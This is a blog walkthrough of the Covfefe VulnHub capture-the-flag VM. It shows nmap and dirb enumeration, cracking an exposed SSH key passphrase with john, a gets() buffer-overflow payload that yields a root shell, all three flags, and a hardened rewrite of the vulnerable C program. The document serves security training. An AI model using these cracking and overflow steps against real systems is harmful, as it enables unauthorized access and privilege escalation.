
Monday, 6 August 2018

[vulnhub]walkthrough: covfefe

  • About

Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags. It is intended for beginners and requires enumeration then [spoiler]!


  • Walkthrough

    # nmap -v -A -p- 192.168.1.103 -oA scan

    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
    | ssh-hostkey:
    |   2048 d0:6a:10:e0:fb:63:22:be:09:96:0b:71:6a:60:ad:1a (RSA)
    |   256 ac:2c:11:1e:e2:d6:26:ea:58:c4:3e:2d:3e:1e:dd:96 (ECDSA)
    |_  256 13:b3:db:c5:af:62:c2:b1:60:7d:2f:48:ef:c3:13:fc (EdDSA)
    80/tcp    open  http    nginx 1.10.3
    | http-methods:
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.10.3
    |_http-title: Welcome to nginx!
    31337/tcp open  http    Werkzeug httpd 0.11.15 (Python 3.5.3)
    | http-robots.txt: 3 disallowed entries
    |_/.bashrc /.profile /taxes
    |_http-title: 404 Not Found
     
    We see an HTTP service on ports 80 and 31337. Let's run dirb against them.

    On port 80 nothing is found. Port 31337 gives better results:

    # dirb http://192.168.1.103:31337
    ---- Scanning URL: http://192.168.1.103:31337/ ----
    + http://192.168.1.103:31337/.bash_history (CODE:200|SIZE:430)
    + http://192.168.1.103:31337/.bashrc (CODE:200|SIZE:3526)
    + http://192.168.1.103:31337/.profile (CODE:200|SIZE:675)
    + http://192.168.1.103:31337/.ssh (CODE:200|SIZE:43)
    + http://192.168.1.103:31337/robots.txt (CODE:200|SIZE:70)
     
    I downloaded the files and looked at robots.txt.

    User-agent: *
    Disallow: /.bashrc
    Disallow: /.profile
    Disallow: /taxes
     
    I checked /taxes and found the first flag: flag1{make_america_great_again}
    I went through all the other files; the interesting one is .ssh, which lists:

    ['id_rsa', 'authorized_keys', 'id_rsa.pub']

    From authorized_keys we learn that simon is the user. We also have id_rsa, so let's connect to the box: # ssh -i id_rsa simon@192.168.1.103 and… we need the key's passphrase :(

    We could brute-force the login, but since we have id_rsa we can try to crack its passphrase instead. Convert the key with ssh2john id_rsa > pass and run john against it:

    john -show sshjohn
    id_rsa:starwars
    
    1 password hash cracked, 0 left
    

    Connect over SSH with the passphrase starwars. Nice, we're in!

    Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Fri Dec 22 18:53:36 2017 from 192.168.1.102
    simon@covfefe:~$
     
    Listing the home directory, we find:

    simon@covfefe:~$ ls -l
    total 12
    -rwxr-xr-x 1 simon simon 449 Jul  9  2017 http_server.py
    -rw-r--r-- 1 simon simon 767 Dec 22 18:58 read_message.c
    -rw-r--r-- 1 simon simon  70 Jul  9  2017 robots.tx
     
    OK, remember the .bash_history file? Let's try running the command it shows:

    simon@covfefe:~$ read_message
    What is your name?
    Simon
    Hello Simon! Here is your message:
    
    Hi Simon, I hope you like our private messaging system.
    
    I'm really happy with how it worked out!
    
    If you're interested in how it works, I've left a copy of the source code in my home directory.
    
    - Charlie Root
    

    OK, let's check the code!
     
    simon@covfefe:~$ cat read_message.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    // You're getting close! Here's another flag:
    // flag2{use_the_source_luke}
    
    int main(int argc, char *argv[]) {
        char program[] = "/usr/local/sbin/message";
        char buf[20];
        char authorized[] = "Simon";
    
        printf("What is your name?\n");
        gets(buf);
    
        // Only compare first five chars to save precious cycles:
        if (!strncmp(authorized, buf, 5)) {
            printf("Hello %s! Here is your message:\n\n", buf);
            // This is safe as the user can't mess with the binary location:
            execve(program, NULL, NULL);
        } else {
            printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
            exit(EXIT_FAILURE);
        }
    
    }
     
    First, we have another flag: flag2{use_the_source_luke}
    Second, it looks like we need to overflow this program's buffer. buf is only 20 bytes and gets() has no length limit, and the comment tells us only the first five characters are compared, so the name just has to start with Simon. Whatever we type past the 20th byte spills into the program array that sits next to buf on the stack, overwriting the path that is handed to execve(). Let's do this:

    simon@covfefe:~$ read_message
    What is your name?
    Simon123456789012345/bin/sh
    Hello Simon123456789012345/bin/sh! Here is your message:
    
    # whoami
    root
    #
    
    
    We are root! Good job!
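    As an added example (not the VM's own code), here is a hardened rewrite of read_message.c that removes both defects the walkthrough relies on: the unbounded gets() into the 20-byte buf and the 5-character strncmp(). Over-long names are rejected instead of spilling into the neighbouring program path, and the comparison covers the whole string. The name length limit and the messages are my assumptions.

```c
/* Hardened rewrite of read_message.c (added example, not the VM's code):
 * fgets() with a size instead of gets(), over-long names rejected, full
 * strcmp() instead of a 5-byte strncmp(), and a const program path. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NAME_MAX_LEN 20
static const char *const PROGRAM = "/usr/local/sbin/message";
static const char AUTHORIZED[] = "Simon";

/* Read one line into buf (size len). Returns 0 on success, -1 on EOF,
 * -2 if the line did not fit (the rest of that line is discarded). */
int read_name(char *buf, size_t len, FILE *in) {
    if (!fgets(buf, (int)len, in)) return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') { buf[n - 1] = '\0'; return 0; }
    if (n < len - 1) return 0;         /* short last line, no newline */
    int c = fgetc(in);                 /* buffer full: was that the whole line? */
    if (c == EOF || c == '\n') return 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                              /* drain the over-long remainder */
    return -2;
}

/* Whole-string comparison: "Simon123..." is no longer accepted. */
int is_authorized(const char *name) {
    return strcmp(AUTHORIZED, name) == 0;
}

int main(void) {
    char buf[NAME_MAX_LEN];
    printf("What is your name?\n");
    if (read_name(buf, sizeof buf, stdin) != 0) {
        printf("Name too long or missing.\n");
        return EXIT_FAILURE;
    }
    if (!is_authorized(buf)) {
        printf("Sorry %s, you're not %s!\n", buf, AUTHORIZED);
        return EXIT_FAILURE;
    }
    printf("Hello %s! Here is your message:\n\n", buf);
    char *const argv[] = { "message", NULL };
    char *const envp[] = { NULL };
    execve(PROGRAM, argv, envp);
    return EXIT_FAILURE;               /* only reached if execve failed */
}
```

    With this version the payload from the walkthrough is refused before the comparison runs, and the path passed to execve() lives in read-only storage rather than on the stack.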

    Let's check what is in the root directory.

    # cd /root && ls -la
    total 24
    drwxr-xr-x  2 root root 4096 Jul  9  2017 .
    drwxr-xr-x 21 root root 4096 Jun 28  2017 ..
    -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
    -rw-r--r--  1 root root  148 Aug 18  2015 .profile
    -rw-------  1 root root   75 Jul  9  2017 flag.txt
    -rw-r--r--  1 root root  767 Jul  9  2017 read_message.c
     
    Get the flag

    You did it! Congratulations, here's the final flag:
     

    flag3{das_bof_meister}
     
    Good job :>